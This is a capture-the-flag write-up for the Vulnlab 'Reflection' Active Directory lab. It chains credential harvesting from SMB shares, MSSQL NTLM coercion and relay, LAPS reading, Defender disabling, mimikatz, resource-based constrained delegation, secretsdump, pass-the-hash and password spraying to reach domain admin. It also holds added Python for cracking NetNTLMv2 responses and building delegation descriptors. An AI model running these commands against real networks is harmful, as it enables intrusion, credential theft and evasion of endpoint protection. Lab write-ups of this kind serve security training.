CTF-Writeups/Vulnlab/Reflection.md
2023-08-14 19:07:40 +03:00


Vulnlab - Reflection

NMAP

DC01.reflection.vl

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-08-13 18:24:44Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC                                             
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn                                     
445/tcp   open  microsoft-ds? syn-ack ttl 127 
464/tcp   open  kpasswd5?     syn-ack ttl 127    
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0                               
636/tcp   open  tcpwrapped    syn-ack ttl 127
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM                      
|_ssl-date: 2023-08-13T18:26:16+00:00; -1s from scanner time.
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)                     
3269/tcp  open  tcpwrapped    syn-ack ttl 127    
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
62571/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows   

MS01.reflection.vl

Host is up, received echo-reply ttl 127 (0.21s latency). 
Scanned at 2023-08-13 21:52:56 PKT for 264s
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE SERVICE    REASON          VERSION
135/tcp  open  tcpwrapped syn-ack ttl 127
445/tcp  open  tcpwrapped syn-ack ttl 127
1433/tcp open  ms-sql-s   syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
3389/tcp open  tcpwrapped syn-ack ttl 127
|_ssl-date: 2023-08-13T16:57:16+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=ms01.reflection.vl
5985/tcp open  tcpwrapped syn-ack ttl 127

WS01.reflection.vl

Host is up, received echo-reply ttl 127 (0.22s latency). 
Scanned at 2023-08-13 21:52:56 PKT for 264s
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE    REASON          VERSION
135/tcp  open  tcpwrapped syn-ack ttl 127
445/tcp  open  tcpwrapped syn-ack ttl 127
3389/tcp open  tcpwrapped syn-ack ttl 127
| ssl-cert: Subject: commonName=ws01.reflection.vl

PORT 445 (SMB)

Enumerating the SMB shares on the three hosts, only MS01 returns a share listing with null (anonymous) authentication.

Accessing the `staging` share we get the `staging_db.conf` file, which contains credentials. With `crackmapexec` we can try to authenticate over SMB to verify that these credentials are valid:
cme smb hosts.txt -u 'web_staging' -p 'Washroom510'

Since MSSQL is running on both DC01 and MS01, we can also try authenticating over MSSQL. The config file describes a database user, so we use local SQL authentication rather than a domain login:

cme mssql hosts.txt -u 'web_staging' -p 'Washroom510' --local-auth

We get a valid login, so we can proceed with `mssqlclient.py` from impacket:

mssqlclient.py web_staging:'Washroom510'@10.10.173.134

`xp_cmdshell` was not allowed for this user, so no command execution from here.

We can however use `xp_dirtree` to make the SQL Server connect to a UNC path on our machine. The server authenticates to us with the MSSQL service account, which yields that account's NetNTLMv2 challenge-response.

Cracking this hash didn't work either.

Since we can't crack it, we can relay it instead: SMB signing is disabled on the hosts, and the coercion can be repeated on demand to get a fresh authentication.
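To make the cracking and relaying choice concrete, here is an added example (not code from the writeup or from impacket/Responder) of what a captured NetNTLMv2 "hash" actually is and how a cracker checks a candidate against it. NetNTLMv2 is an HMAC-MD5 keyed by the NT hash and bound to the server challenge, so the captured value cannot be replayed later as a password equivalent; it can only be relayed while the coerced connection is live, or recomputed offline per candidate password. MD4 is implemented by hand because `hashlib.new("md4")` is missing on many OpenSSL 3 builds. The sample line, the client challenge and the password `Example-Svc-Pa55` are constructed for the demo; the real response captured for svc_web_staging is not reproduced, and the coercing query itself (`EXEC master..xp_dirtree '\\<attacker-ip>\share'` is the usual form) is not shown on the page.

```python
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 of the UTF-16LE password."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                ai = (-i) % 4  # registers rotate (a,b,c,d) -> (d,a,b,c) -> (c,d,a,b) -> (b,c,d,a)
                a, b, c, d = (s[(ai + j) % 4] for j in range(4))
                s[ai] = rotl((a + func(b, c, d) + x[k] + const) & MASK32, shifts[i % 4])
        state = [(u + v) & MASK32 for u, v in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || blob),
    where NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) || domain) in UTF-16LE (MS-NLMP 3.3.2)."""
    ntowf_v2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(ntowf_v2, server_challenge + blob, "md5").digest()


def verify_netntlmv2(hashcat_line: str, candidate: str) -> bool:
    """Check one candidate password against a Responder / hashcat -m 5600 line:
    USER::DOMAIN:SERVERCHALLENGE:NTPROOFSTR:BLOB (hex fields after the domain)."""
    user, _, domain, challenge, proof, blob = hashcat_line.split(":", 5)
    computed = ntlmv2_proof(candidate, user, domain, bytes.fromhex(challenge), bytes.fromhex(blob))
    return hmac.compare_digest(computed, bytes.fromhex(proof))


def crack_netntlmv2(hashcat_line: str, wordlist):
    """What hashcat does per candidate; returns the matching password or None."""
    for candidate in wordlist:
        if verify_netntlmv2(hashcat_line, candidate):
            return candidate
    return None


def make_sample_line(password: str) -> str:
    """Constructed NetNTLMv2 line for the demo; the password and nonces are invented."""
    user, domain = "svc_web_staging", "REFLECTION"
    server_challenge = bytes.fromhex("1122334455667788")
    # NTLMv2_CLIENT_CHALLENGE ("temp"): RespType/HiRespType 0x0101, reserved, timestamp,
    # client nonce, reserved, AV_PAIR list (EOL only here), reserved.
    blob = (bytes.fromhex("01010000") + b"\x00" * 4 + b"\x00" * 8
            + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4)
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


SAMPLE_LINE = make_sample_line("Example-Svc-Pa55")  # constructed, not the real service password

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_netntlmv2(SAMPLE_LINE, ["Washroom510", "Tribesman201", "Example-Svc-Pa55"]))
```

Because the proof is bound to the 8-byte server challenge inside the relayed session, the only use of a captured response is the one ntlmrelayx.py makes of it: forward it to a target that will accept it before the session closes.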

With `ntlmrelayx.py` we can relay the authentication to another host.

The relay to SMB works. We can also relay it to the MSSQL instance on DC01, which lets us execute queries there as svc_web_staging:

ntlmrelayx.py -t mssql://10.10.173.133 -smb2support --query 'SELECT @@version'

Enumerating the databases, there is one called `prod`:

ntlmrelayx.py -t mssql://10.10.132.133 -smb2support --query 'SELECT name FROM master.dbo.sysdatabases;'

Listing the tables in that database didn't work, as this user has no access to it, and trying to enable `xp_cmdshell` failed here as well.

So there was nothing more to gain over MSSQL. But since svc_web_staging was able to authenticate over SMB earlier, we can list and access the shares on DC01 as that user. For this we use ntlmrelayx's SOCKS mode, which keeps the relayed SMB sessions open and lists the relays that were successful:

ntlmrelayx.py -tf hosts.txt -smb2support -socks

It shows that this user is not an admin, but we can still access the SMB shares as a domain user with smbclient.

To my surprise this didn't work and I don't know the reason; maybe it's an issue with my version of smbclient, but smbclient.py from impacket worked like a charm:

proxychains smbclient.py reflection/svc_web_staging@10.10.132.133

From the `prod` share we can grab `prod_db.conf`.

Having the credentials for the production database, we can enumerate it:

mssqlclient.py web_prod:Tribesman201@10.10.132.133

From the users table we get two sets of credentials.

On verifying these credentials, both turn out to be domain users.

Now we can enumerate the domain with `bloodhound`; before doing that, make sure to add an entry for dc01.reflection.vl to the hosts file:

python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'reflection.vl' -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' -ns 10.10.132.133 -c all

From BloodHound we see these two users are members of the Staff group.

The Staff group has no interesting ACLs, but abbie has `GenericAll` on `MS01`.

With GenericAll on a computer object the usual move is resource-based constrained delegation from a computer account we control, but we can't simply add one: the machine account quota is 0.

However, GenericAll on MS01 also lets us read its LAPS password, the randomized local administrator password managed by LAPS:

cme smb 10.10.132.134 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' --laps
evil-winrm -i 10.10.132.134 -u 'administrator' -p 'H447.++h6g5}xi'

Disable Defender with `Set-MpPreference -DisableRealtimeMonitoring $true`.

Upload netcat and get a shell again, as evil-winrm was causing issues with mimikatz.

From the cached credentials we see Georgia.Price.

With `vault::cred /patch` we can list the credentials stored in the Credential Manager vault.

Going back to BloodHound, this user also has GenericAll on WS01.

We know there is no machine account quota available, but we do have full control of MS01, so we can add MS01$ to WS01's `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute instead (resource-based constrained delegation). To use it we need the NT hash of MS01$, which we can obtain on MS01 as local administrator.

Editing `msDS-AllowedToActOnBehalfOfOtherIdentity` with `rbcd.py` from impacket, authenticating as Georgia.Price (the user holding GenericAll on WS01):

rbcd.py -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.188.197 "Reflection/Georgia.Price:DBl+5MPkpJg5id"
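What `rbcd.py -action write` actually stores is worth seeing once, because it is what a defender hunts for and what you must preserve if the attribute already has entries. The attribute holds a self-relative security descriptor (MS-DTYP 2.4.6) whose DACL grants full control to the SID of the account allowed to delegate; the KDC then lets that account obtain S4U2Proxy tickets to the target. The following is an added example, not the writeup's or impacket's code, and needs no impacket: it builds the descriptor the same way rbcd.py does (owner/group BUILTIN\Administrators, ACL revision 4, access mask 0xF01FF), parses one back, and appends a second SID without dropping the first. The SID for MS01$ below is constructed; in practice you read it from the computer object's objectSid over LDAP.

```python
import struct

# MS-DTYP constants for the security descriptor, ACL and ACE wire formats.
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF          # 983551, the mask rbcd.py writes
BUILTIN_ADMINS = "S-1-5-32-544"    # placeholder owner/group, as rbcd.py sets
SD_HEADER = "<BBHIIII"             # Revision, Sbz1, Control, OffOwner, OffGroup, OffSacl, OffDacl
ACL_HEADER = "<BBHHH"              # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBHI"               # AceType, AceFlags, AceSize, Mask


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...-1106' -> binary SID (revision, count, 48-bit BE authority, LE sub-authorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: " + sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(data: bytes, offset: int = 0):
    """Returns (sid_string, byte_length) for the SID starting at offset."""
    rev, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def allow_ace(sid: str, mask: int) -> bytes:
    sid_b = sid_to_bytes(sid)
    return struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), mask) + sid_b


def build_rbcd_sd(delegate_from_sids) -> bytes:
    """Self-relative SD: header, owner SID, group SID, then the DACL (no SACL)."""
    owner = group = sid_to_bytes(BUILTIN_ADMINS)
    aces = b"".join(allow_ace(s, FULL_CONTROL) for s in delegate_from_sids)
    dacl = struct.pack(ACL_HEADER, ACL_REVISION_DS, 0, 8 + len(aces), len(delegate_from_sids), 0) + aces
    off_owner = struct.calcsize(SD_HEADER)
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(group)
    header = struct.pack(SD_HEADER, 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT, off_owner, off_group, 0, off_dacl)
    return header + owner + group + dacl


def parse_rbcd_sd(blob: bytes):
    """List (sid, mask) for every ACCESS_ALLOWED ACE in the DACL; this is what to audit on a target."""
    rev, _, control, _, _, _, off_dacl = struct.unpack_from(SD_HEADER, blob, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, blob, off_dacl)
    pos, out = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from(ACE_HEADER, blob, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            out.append((sid_from_bytes(blob, pos + 8)[0], mask))
        pos += ace_size
    return out


def add_delegate(existing: bytes, sid: str) -> bytes:
    """Append one more allowed SID, keeping the allow ACEs already present (all re-encoded with full control)."""
    sids = [s for s, _ in parse_rbcd_sd(existing)] if existing else []
    if sid not in sids:
        sids.append(sid)
    return build_rbcd_sd(sids)


if __name__ == "__main__":
    ms01_sid = "S-1-5-21-1111111111-2222222222-3333333333-1106"  # constructed, not the lab's real SID
    sd = build_rbcd_sd([ms01_sid])
    print(sd.hex())
    print(parse_rbcd_sd(sd))
```

The bytes returned by `build_rbcd_sd` are the value written to `msDS-AllowedToActOnBehalfOfOtherIdentity` with an LDAP modify; reading the attribute back through `parse_rbcd_sd` is also how you verify the write before requesting the ticket, and the same parser turned on every computer object is a cheap detection for unexpected RBCD entries.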

After writing the attribute, we can request a service ticket for WS01 impersonating Administrator with `getST.py`, authenticating as MS01$ with its NT hash:

getST.py -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.188.197 'Reflection/MS01$' -hashes ':6e77d4ac157a47c5581681b8f865677e'

Now we can dump the hashes from WS01 with that ticket (export the ccache saved by getST.py via KRB5CCNAME first):

secretsdump.py administrator@WS01.reflection.vl -k -no-pass

Since Defender was enabled on WS01, we couldn't get a shell through psexec.py.

We can however use `atexec.py` to schedule a command as the local administrator that disables Defender:

atexec.py ws01/administrator@10.10.188.199 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02'

After this, psexec.py gives us a shell:

psexec.py administrator@WS01.reflection.vl -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02'

Since we already dumped the hashes, we also have the password of Rhys.Garner, who is a local admin on WS01. This user has no ACLs on any object, but checking Domain Admins, there are two members.

We can try spraying that password against them to see whether it is reused.

This works for DOM_RGARNER; with that account we can log in to DC01 over WinRM and we are domain admin.
